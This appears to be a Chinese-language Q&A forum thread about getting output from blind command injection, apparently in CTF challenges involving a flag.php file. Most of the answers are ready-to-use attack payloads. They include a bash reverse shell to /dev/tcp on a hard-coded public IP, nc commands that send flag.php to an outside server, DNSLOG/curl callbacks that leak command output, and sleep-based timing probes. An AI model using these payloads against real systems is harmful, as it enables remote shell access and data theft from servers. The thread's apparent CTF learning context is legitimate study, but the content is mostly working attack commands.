1.linux系统的话可以试试有没有延时来判断命令 sleep 5
2.利用nc命令在自己的vps上建立监听,来判断是否存在
5 个回答
可以试试nc反弹 来判断
还有两种方法,1.使用ceye平台来接收回显,2.在Vps开启Web服务或防火墙没有禁用Icmp的时候,发送Http或Icmp包后会在日志中留下记录,直接查看日志记录即可获得命令回显。
可以试试nc反弹,进行监听来判断
方法1.
使用cp 命令cp flag.php 1.txt
然后访问(该方法简单,但是可能禁止使用cp命令)
方法2.
DNSLOG获取回显
cmd=curl `命令`.域名
方法3.
反弹shell
自己公网服务器nc -vv -lp 8888
目标服务器:cmd=bash+-i+>&+/dev/tcp/47.95.206.199/8888+0>&1
方法4.
使用nc
自己公网服务器nc -ulp 8888
目标服务器:cmd=nc -u 47.94.35.59 8888 < flag.php
(要求目标服务器也有nc工具,-u参数调整为udp,当tcp不能使用的时候使用)
方法5.
curl上传文件读取源码
这篇文章写的还可以:
https://www.cnblogs.com/hello-py/articles/13385679.html